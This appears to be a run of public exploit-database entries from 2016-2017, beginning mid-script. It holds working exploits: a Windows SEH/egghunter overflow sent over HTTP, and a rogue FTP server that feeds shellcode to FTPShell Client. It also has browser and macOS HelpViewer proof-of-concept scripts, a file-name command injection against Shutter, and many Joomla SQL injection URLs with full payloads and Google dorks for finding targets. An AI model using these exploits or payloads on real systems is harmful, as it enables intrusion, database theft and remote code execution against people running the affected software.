# the author (see header comments). Both embed the tag bytes "t00w".
if os == "win7":
    wow64_egghunter = ("\x66\x8c\xcb\x80\xfb\x23\x75\x08\x31\xdb\x53\x53\x53\x53\xb3\xc0"
                       "\x33\xd2"
                       "\x66\x81\xca\xff\x0f\x42\x52\x80\xfb\xc0\x74\x19\x6a\x02\x58\xcd"
                       "\x2e\x5a\x3c\x05\x74\xef\xb8"
                       "\x74\x30\x30\x77"
                       "\x89\xd7\xaf\x75\xe5\xaf\x75\xe2\xff\xe7\x6a\x26\x58\x31\xc9\x89"
                       "\xe2\x64\xff\x13\x5e\x5a\xeb\xdf")
elif os == "win10":
    wow64_egghunter = ("\x66\x8c\xcb\x80\xfb\x23\x75\x10\x31\xd2\x66\x81\xca\xff\x0f\x31"
                       "\xdb\x42\x52\x53\x53\x53\xb3\xc0\x80\xfb\xc0\x74\x13\x3c\x05\x74\xee\xb8"
                       "\x74\x30\x30\x77"
                       "\x89\xd7\xaf\x75\xe4\xaf\x75\xe1\xff\xe7"
                       "\x6a\x29\x58\x64\xff\x13\x83\xc4\x0c\x5a\xeb\xe1")
else:
    print "[!] This windows version is not supported yet"
    exit(0)   # inconsistent with sys.exit() above; exit() is the interactive-site helper

exploit = crash + nseh + retn + nops + wow64_egghunter + stack_fill + egg + nops + shell + filler
# The whole buffer travels in the request-target of the GET line; the headers
# below mimic a browser. Content-Length announces a body that is never sent.
buffer = "GET /"+exploit+" HTTP/1.1\r\n"
buffer+= "Host: "+host+"\r\n"
buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2\r\n"
buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buffer+="Accept-Language: en-US,en;q=0.5\r\n"
buffer+="Accept-Encoding: gzip, deflate\r\n"
buffer+="Referer: http://"+host+"/login\r\n"
buffer+="Connection: keep-alive\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
buffer+="Content-Length: 5900\r\n\r\n"
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((host,port))   # connect() returns None; this variable is never used
s.send(buffer)                   # byte count not checked (sendall would be conventional); no response is read
s.close()
# Exploit Title: Shutter user-assisted remote code execution
# Date: 2016-12-26
# Software Link: http://shutter-project.org/
# Version: 0.93.1
# Tested on: Ubuntu, Debian
# Exploit Author: Prajith P
# Website: http://prajith.in/
# Author Mail: me@prajith.in
# CVE: CVE-2016-10081
1. Description.
/usr/bin/shutter in Shutter through 0.93.1 allows user-assisted remote
attackers to execute arbitrary commands via a crafted image name that is
mishandled during a "Run a plugin" action.
2. Proof of concept.
1) Rename an image to something like "$(firefox)"
2) Open the renamed file in shutter
3) Click the "Run a plugin" option and select any plugin from the list and click "Run"
3. Solution:
https://bugs.launchpad.net/shutter/+bug/1652600
Thanks,
Prajithh
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1024
Chrome bug:
https://bugs.chromium.org/p/chromium/issues/detail?id=671328
PoC:
-->
<style>
content { contain: size layout; }
</style>
<script>
// PoC trigger, run from <body onload>. Selects the whole document, then empties
// the text of the <option id="opt"> that sits inside the size/layout-contained
// <content> element (`opt` resolves through the window's named-element
// property). The order of the two statements is what reproduces the layout
// bug in the referenced Chromium issue.
function leak() {
  document.execCommand("selectAll");
  opt.text = "";
}
</script>
<body onload=leak()>
<content>
<select>
<option id="opt">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</option>
</select>
</content>
<!--
Since this is a layout bug AFAIK the leaked data can't be obtained via DOM calls, however it's possible to obtain it using tricks like unicode-range CSS descriptor (credits to Jann Horn for coming up with that approach) which is likely sufficient to turn this into an ASLR bypass.
-->
# # # # #
# Exploit Title: Joomla! Component Store for K2 v3.8.2 - SQL Injection
# Google Dork: inurl:index.php?option=com_k2store
# Date: 23.02.2017
# Vendor Homepage: http://jworkplace.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/extension-specific/k2-extensions/store-for-k2/
# Demo: http://k2store.jworkplace.com/
# Version: 3.8.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_k2store&view=checkout&task=getCountry&=[SQL]
# # # # #
# # # # #
# Exploit Title: Joomla! Component UserExtranet v1.3.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_userextranet
# Date: 23.02.2017
# Vendor Homepage: http://www.beesto.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/access-a-security/site-access/userextranet/
# Demo: http://www.beesto.com/extensions/18-userextranet/93-demo
# Version: 1.3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php?option=com_userextranet&view=folders&fid=[SQL]
# 66+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# # # # #
# # # # #
# Exploit Title: Joomla! Component MultiTier v3.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_multitier
# Date: 23.02.2017
# Vendor Homepage: http://www.beesto.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/affiliate-systems/multitier/
# Demo: http://www.beesto.com/extensions/13-j-multitier/40-demo
# Version: 3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php/component/multitier/?mtpage=takecodel&tid=1&lid=[SQL]
# -66'+/*!50000union*/+select+1,0x496873616e2053656e63616e,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8+-- -
# http://localhost/[PATH]/index.php/component/multitier/?mtpage=link_preview&id=[SQL]
# -66'+/*!50000union*/+select+1,0x496873616e2053656e63616e,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8+-- -
# http://localhost/[PATH]/index.php/component/multitier/?mtpage=takecodeb&tid=1&bid=[SQL]
# -66'+/*!50000union*/+select+(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),2,3+-- -
# # # # #
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1040
HelpViewer is an application and using WebView to show a help file.
You can see it simply by the command:
open /Applications/Safari.app/Contents/Resources/Safari.help
or using "help:" scheme:
help:openbook=com.apple.safari.help
help:///Applications/Safari.app/Contents/Resources/Safari.help/Contents/Resources/index.html
HelpViewer's WebView has an inside protocol handler "x-help-script" that could be used to open an arbitrary local file. Therefore if we can run arbitrary Javascript code, we'll win easily and, of course, we can read an arbitrary local file with a XMLHttpRequest.
HelpViewer checks whether the path of the url is in a valid help file or not. But we can bypass this with a double encoded "../".
PoC:
document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=javascript%253adocument.write(1)";
The attached poc will pop up a Calculator.
Tested on macOS Sierra 10.12.1 (16B2659).
-->
<script>
/*
OSX: HelpViewer XSS leads to arbitrary file execution and arbitrary file read.
HelpViewer is an application and using WebView to show a help file.
You can see it simply by the command:
open /Applications/Safari.app/Contents/Resources/Safari.help
or using "help:" scheme:
help:openbook=com.apple.safari.help
help:///Applications/Safari.app/Contents/Resources/Safari.help/Contents/Resources/index.html
HelpViewer's WebView has an inside protocol handler "x-help-script" that could be used to open an arbitrary local file. Therefore if we can run arbitrary Javascript code, we'll win easily and, of course, we can read an arbitrary local file with a XMLHttpRequest.
HelpViewer checks whether the path of the url is in a valid help file or not. But we can bypass this with a double encoded "../".
PoC:
document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=javascript%253adocument.write(1)";
The attached poc will pop up a Calculator.
Tested on macOS Sierra 10.12.1 (16B2659).
*/
// PoC driver (HelpViewer): the bug itself is described in the block comment above.
// Stage 1 navigates HelpViewer to a help: URL whose path carries double-encoded
// "../" segments (the path-check bypass noted above) and a `redirect=` query
// holding a javascript: URL; stage 2 (`second`) then runs inside HelpViewer's
// WebView once that redirect has been followed.
function main() {
  // Stage 2: serialized with toString(), base64-encoded and embedded in the
  // javascript: URL built below, where it is eval'd and then called.
  function second() {
    var f = document.createElement("iframe");
    f.onload = () => {
      // The internal "x-help-script" handler opens the local item named in the
      // URL (Calculator.app here, hence the Calculator pop-up mentioned above).
      f.contentDocument.location = "x-help-script://com.apple.machelp/scpt/OpnApp.scpt?:Applications:Calculator.app";
    };
    f.src = "help:openbook=com.apple.safari.help";
    document.documentElement.appendChild(f);
  }
  // "%253a" is a double-encoded ":"; atob()/eval re-hydrate `second` at the far end.
  var url = "javascript%253aeval(atob('" + btoa(second.toString()) + "'));\nsecond();";
  // "%25252f" is a double-encoded "/", so each "%25252f.." becomes a "../" after the
  // path check has already run.
  document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=" + url;
}
// Entry point: the PoC starts as soon as the script is parsed.
main();
</script>
# # # # #
# Exploit Title: Joomla! Component JooDatabase v3.1.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_joodb
# Date: 24.02.2017
# Vendor Homepage: https://feenders.de/
# Software Buy: https://extensions.joomla.org/extensions/extension/core-enhancements/coding-a-scripts-integration/joodatabase/
# Demo: https://joodb.feenders.de/db-example.html
# Version: 3.1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_joodb&view=catalog&format=html&reset=false&Itemid=321&task=&search=[SQL]&searchfield=Ihsan_Sencan
# http://localhost/[PATH]/index.php?option=com_joodb&view=catalog&format=html&reset=false&Itemid=321&task=&search=Ihsan_Sencan&searchfield=[SQL]
# # # # #
# # # # #
# Exploit Title: Joomla! Component JO Facebook Gallery v4.5 - SQL Injection
# Google Dork: inurl:index.php?option=com_jofacebookgallery
# Date: 24.02.2017
# Vendor Homepage: http://joomcore.com/joomla32/
# Software Buy: https://extensions.joomla.org/extensions/extension/social-web/social-media/jo-facebook-gallery/
# Demo: http://demo.joomcore.com/joomla32/
# Version: 4.5
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_jofacebookgallery&view=category&id=[SQL]
# http://localhost/[PATH]/index.php?option=com_jofacebookgallery&view=albums&id=[SQL]
# http://localhost/[PATH]/index.php?option=com_jofacebookgallery&view=photo&id=[SQL]
# # # # #
# # # # #
# Exploit Title: Joomla! Component AJAX Search for K2 v2.2 - SQL Injection
# Google Dork: inurl:index.php?option=com_k2ajaxsearch
# Date: 24.02.2017
# Vendor Homepage: http://taleia.software/
# Software Buy: https://extensions.joomla.org/extensions/extension/extension-specific/k2-extensions/ajax-search-for-k2/
# Demo: http://k2ajaxsearch.taleia.software/demo/
# Version: 2.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&=[SQL]
# http://localhost/[PATH]/?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&module_id=101&efields[][]=[SQL]
# http://localhost/[PATH]/?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&module_id=[SQL]&efields[][]=Ihsan_Sencan
# # # # #
# # # # #
# Exploit Title: Joomla! Component Community Surveys v4.3 - SQL Injection
# Google Dork: inurl:index.php?option=com_communitysurveys
# Date: 24.02.2017
# Vendor Homepage: http://corejoomla.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/surveys/community-surveys/
# Demo: http://demo.corejoomla.com/surveys.html
# Version: 4.3
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# index.php?option=com_communitysurveys&view=search
# http://localhost/[PATH]/?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_keywords=1&filter_order=a.catid&filter_order_Dir=desc&catid[]=[SQL]
# 66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1
# # # # #
# # # # #
# Exploit Title: Joomla! Component Community Polls v4.5.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_communitypolls
# Date: 24.02.2017
# Vendor Homepage: http://corejoomla.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/polls/community-polls/
# Demo: http://demo.corejoomla.com/polls.html
# Version: 4.5.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# index.php?option=com_communitypolls&view=search
# http://localhost/[PATH]/?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_keywords=1&filter_order=a.catid&filter_order_Dir=desc&catid[]=[SQL]
# 66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1
# # # # #
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1049
When the new page is loading, FrameLoader::clear is called to clear the old document and window.
Here's a snippet of FrameLoader::clear.
void FrameLoader::clear(Document* newDocument, bool clearWindowProperties, bool clearScriptObjects, bool clearFrameView)
{
...
// Do this after detaching the document so that the unload event works.
if (clearWindowProperties) {
InspectorInstrumentation::frameWindowDiscarded(m_frame, m_frame.document()->domWindow());
m_frame.document()->domWindow()->resetUnlessSuspendedForDocumentSuspension();
m_frame.script().clearWindowShell(newDocument->domWindow(), m_frame.document()->pageCacheState() == Document::AboutToEnterPageCache); <<-------- (1)
if (shouldClearWindowName(m_frame, *newDocument))
m_frame.tree().setName(nullAtom);
}
...
m_frame.setDocument(nullptr); <<-------- (2)
...
}
The new document's window is attached at (1), before the call to |m_frame.setDocument(nullptr)| at (2), which runs the unload event handlers. So, from an unload event handler, we can execute arbitrary JavaScript code in the new document's window via a javascript: URI.
Tested on Safari 10.0.2(12602.3.12.0.1).
-->
<body>
<script>
/*
Apple WebKit: UXSS via FrameLoader::clear
When the new page is loading, FrameLoader::clear is called to clear the old document and window.
Here's a snippet of FrameLoader::clear.
void FrameLoader::clear(Document* newDocument, bool clearWindowProperties, bool clearScriptObjects, bool clearFrameView)
{
...
// Do this after detaching the document so that the unload event works.
if (clearWindowProperties) {
InspectorInstrumentation::frameWindowDiscarded(m_frame, m_frame.document()->domWindow());
m_frame.document()->domWindow()->resetUnlessSuspendedForDocumentSuspension();
m_frame.script().clearWindowShell(newDocument->domWindow(), m_frame.document()->pageCacheState() == Document::AboutToEnterPageCache); <<-------- (1)
if (shouldClearWindowName(m_frame, *newDocument))
m_frame.tree().setName(nullAtom);
}
...
m_frame.setDocument(nullptr); <<-------- (2)
...
}
The new document's window is attached at (1), before the call to |m_frame.setDocument(nullptr)| at (2), which runs the unload event handlers. So, from an unload event handler, we can execute arbitrary JavaScript code in the new document's window via a javascript: URI.
Tested on Safari 10.0.2(12602.3.12.0.1).
*/
// Strict mode for the whole script (undeclared assignments throw instead of
// silently creating globals).
"use strict";
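// Debug helper (not called by main): appends a "log: <txt>" line to the page.
// @param {string} txt  message to display
function log(txt) {
  //if (Array.isArray(txt))
  // txt = Array.prototype.join.call(txt, ", ");
  let c = document.createElement("div");
  c.innerText = "log: " + txt;
  // The published version appended to an undeclared `d`, which throws a
  // ReferenceError under "use strict"; the document body is a safe container.
  document.body.appendChild(c);
}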
// PoC driver (WebKit UXSS; the bug is described in the block comment above).
// Builds a chain of nested iframes inside `f` whose unload handlers run while
// FrameLoader::clear is tearing down the old document — i.e. after the new
// document's window has already been attached at (1) — and, from the innermost
// handler, navigates `f` to a javascript: URL.
function main() {
  let f = document.body.appendChild(document.createElement("iframe"));
  let a = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
  a.contentWindow.onunload = () => {
    // Each level re-arms the next unload handler on a fresh inner iframe and
    // re-navigates `f` to an empty javascript: URL to trigger another clear().
    // NOTE(review): the nesting depth looks empirical — confirm before relying
    // on it as a reproduction recipe.
    let b = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
    b.contentWindow.onunload = () => {
      f.src = "javascript:''";
      let c = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
      c.contentWindow.onunload = () => {
        f.src = "javascript:''";
        let d = f.contentDocument.appendChild(document.createElement("iframe"));
        d.contentWindow.onunload = () => {
          // Final stage: the function below is stringified, base64-encoded and
          // eval'd via a javascript: URL in `f`; it only alerts document.location
          // to show which origin the code ended up running in.
          f.src = "javascript:setTimeout(eval(atob('" + btoa("(" +function () {
            alert(document.location);
          } + ")") + "')), 0);";
        };
      };
    };
  };
  // Starting the cross-origin navigation of `f` kicks off the unload chain.
  f.src = "https://abc.xyz/";
}
// Entry point: the PoC starts as soon as the script is parsed.
main();
/*
b JSC::globalFuncParseFloat
*/
</script>
</body>
# # # # #
# Exploit Title: Joomla! Component Content ConstructionKit v1.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_os_cck
# Date: 04.03.2017
# Vendor Homepage: http://ordasoft.com/
# Software Buy: http://ordasoft.com/cck-content-construction-kit-for-joomla.html
# Demo: http://ordasvit.com/joomla-cck-classic/
# Version: 1.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php/2016-04-11-13-03-22/search?search=Ihsan_Sencan&categories[]=[SQL]&task=search&option=com_os_cck&Itemid=133
# 9+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e,0x496873616e53656e63616e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
# 1062 Duplicate entry 'ordasvit_joomla-cck-classic~IhsanSencan1' for key 'group_key'
# Etc..
# # # # #
# # # # #
# Exploit Title: Advanced Bus Booking Script v2.04 - SQL Injection
# Google Dork: N/A
# Date: 06.03.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software : http://www.phpscriptsmall.com/product/advanced-bus-booking-script/
# Demo: http://travelbookingscript.com/demo/newbusbooking/
# Version: 2.04
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/available_seat.php?hid_Busid=[SQL]
# http://localhost/[PATH]/seatcheck.php?busid=[SQL]
# http://localhost/[PATH]/seatcheck.php?seat=[SQL]
# http://localhost/[PATH]/seatcheck.php?seat=1&busid=1&dat=[SQL]
# # # # #
# Exploit Title: FTPShell Client 6.53 buffer overflow on making initial connection
# Date: 2017-03-04
# Exploit Author: Peter Baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: http://www.ftpshell.com/downloadclient.htm
# Version: Windows Server 2008 R2 x64
# Tested on: Windows Server 2008 R2 Standard x64
# CVE: CVE-2017-6465
# 2017-03-04: Software vendor notified
# 2017-03-06: No reply
# 2017-03-06: Publishing
import socket
import sys
# Raw payload bytes that the rogue server embeds in the oversized directory
# string below.  Kept byte-for-byte as published; the bytes are opaque here
# (nothing on this page decodes them).
shell=("\xdb\xce\xbf\xaa\xcc\x44\xc9\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
       "\x52\x83\xc2\x04\x31\x7a\x13\x03\xd0\xdf\xa6\x3c\xd8\x08\xa4"
       "\xbf\x20\xc9\xc9\x36\xc5\xf8\xc9\x2d\x8e\xab\xf9\x26\xc2\x47"
       "\x71\x6a\xf6\xdc\xf7\xa3\xf9\x55\xbd\x95\x34\x65\xee\xe6\x57"
       "\xe5\xed\x3a\xb7\xd4\x3d\x4f\xb6\x11\x23\xa2\xea\xca\x2f\x11"
       "\x1a\x7e\x65\xaa\x91\xcc\x6b\xaa\x46\x84\x8a\x9b\xd9\x9e\xd4"
       "\x3b\xd8\x73\x6d\x72\xc2\x90\x48\xcc\x79\x62\x26\xcf\xab\xba"
       "\xc7\x7c\x92\x72\x3a\x7c\xd3\xb5\xa5\x0b\x2d\xc6\x58\x0c\xea"
       "\xb4\x86\x99\xe8\x1f\x4c\x39\xd4\x9e\x81\xdc\x9f\xad\x6e\xaa"
       "\xc7\xb1\x71\x7f\x7c\xcd\xfa\x7e\x52\x47\xb8\xa4\x76\x03\x1a"
       "\xc4\x2f\xe9\xcd\xf9\x2f\x52\xb1\x5f\x24\x7f\xa6\xed\x67\xe8"
       "\x0b\xdc\x97\xe8\x03\x57\xe4\xda\x8c\xc3\x62\x57\x44\xca\x75"
       "\x98\x7f\xaa\xe9\x67\x80\xcb\x20\xac\xd4\x9b\x5a\x05\x55\x70"
       "\x9a\xaa\x80\xd7\xca\x04\x7b\x98\xba\xe4\x2b\x70\xd0\xea\x14"
       "\x60\xdb\x20\x3d\x0b\x26\xa3\x82\x64\xee\xb3\x6b\x77\xee\xa2"
       "\x37\xfe\x08\xae\xd7\x56\x83\x47\x41\xf3\x5f\xf9\x8e\x29\x1a"
       "\x39\x04\xde\xdb\xf4\xed\xab\xcf\x61\x1e\xe6\xad\x24\x21\xdc"
       "\xd9\xab\xb0\xbb\x19\xa5\xa8\x13\x4e\xe2\x1f\x6a\x1a\x1e\x39"
       "\xc4\x38\xe3\xdf\x2f\xf8\x38\x1c\xb1\x01\xcc\x18\x95\x11\x08"
       "\xa0\x91\x45\xc4\xf7\x4f\x33\xa2\xa1\x21\xed\x7c\x1d\xe8\x79"
       "\xf8\x6d\x2b\xff\x05\xb8\xdd\x1f\xb7\x15\x98\x20\x78\xf2\x2c"
       "\x59\x64\x62\xd2\xb0\x2c\x92\x99\x98\x05\x3b\x44\x49\x14\x26"
       "\x77\xa4\x5b\x5f\xf4\x4c\x24\xa4\xe4\x25\x21\xe0\xa2\xd6\x5b"
       "\x79\x47\xd8\xc8\x7a\x42")
# Port the rogue FTP server listens on.
port = 21
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0", port))  # binds on every interface
    s.listen(5)
    print("[i] FTP server started on port: "+str(port)+"\r\n")
except:
    # NOTE(review): the bare except only reports the bind failure and falls
    # through, so `s` stays unbound and the accept() below raises NameError.
    # Exiting here (the `sys` import is otherwise unused) would fail clearly.
    print("[!] Failed to bind the server to port: "+str(port)+"\r\n")
# 004b95dc in ftpshell.exe PUSH ESI ; RETN
# Low three bytes of the address in the comment above, lowest byte first.
eip = "\xdc\x95\x4b"
nops = "\x90"*8
# Pad so that nops + shell + junk is exactly 400 bytes ahead of `eip`.
junk = "A"*(400-len(nops)-len(shell))
buffer = nops + shell + junk + eip
# Minimal scripted FTP dialogue: banner, canned 331/230 replies to whatever the
# client sends, then a malformed 220 line carrying the 400-byte buffer as the
# "current directory" (the client-side overflow described in the header above).
while True:
    conn, addr = s.accept()
    conn.send('220 Welcome to your unfriendly FTP server\r\n')
    print(conn.recv(1024))
    conn.send("331 OK\r\n")
    print(conn.recv(1024))
    conn.send('230 OK\r\n')
    print(conn.recv(1024))
    conn.send('220 "'+buffer+'" is current directory\r\n')
    # NOTE(review): conn is never closed, so every accepted connection leaks
    # until the process exits.
# # # # #
# Exploit Title: Joomla! Component AltaUserPoints v1.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_altauserpoints
# Date: 04.03.2017
# Vendor Homepage: https://www.nordmograph.com/
# Software: https://extensions.joomla.org/extensions/extension/e-commerce/credits-a-point-systems/altauserpoints/
# Demo: https://www.nordmograph.com/workshop/
# Version: 1.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Log in as a regular user
# http://localhost/[PATH]/index.php?option=com_altauserpoints&view=account&userid=[SQL]
# 1'+/*!50000OR*/+1+/*!50000GROUP*/+BY+/*!50000CONCAT_WS*/(0x3a,0x496873616e53656e63616e,DATABASE(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1-- -
# # # # #
# # # # #
# Exploit Title: Joomla! Component Monthly Archive v3.6.4 - SQL Injection
# Google Dork: inurl:index.php?option=com_monthlyarchive
# Date: 04.03.2017
# Vendor Homepage: http://web357.eu/
# Software Buy: https://extensions.joomla.org/extensions/extension/news-display/articles-display/monthly-archive/
# Demo: http://demo.web357.eu/joomla/en/browse/monthly-archive
# Version: 3.6.4
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_monthlyarchive&view=monthlyarchive&month_year_form=07-2017&order=0&author_form=[SQL]
# 1+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e,0x496873616e53656e63616e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
# # # # #
# # # # #
# Exploit Title: Joomla! Component JUX EventOn v1.0.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_jux_eventon
# Date: 04.03.2017
# Vendor Homepage: http://joomlaux.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/jux-eventon/
# Demo: http://demo.joomlaux.com/extensions/eventon/
# Version: 1.0.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_jux_eventon&view=event&id=[SQL]
# 3+union+select+1,@@version,3,4,5,6
# # # # #
# # # # #
# Exploit Title: Entrepreneur Bus Booking Script v3.03 - SQL Injection
# Google Dork: N/A
# Date: 06.03.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software : http://www.phpscriptsmall.com/product/entrepreneur-bus-booking-script/
# Demo: http://travelbookingscript.com/demo/busbooking/
# Version: 3.03
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/available_seat.php?hid_Busid=[SQL]
# # # # #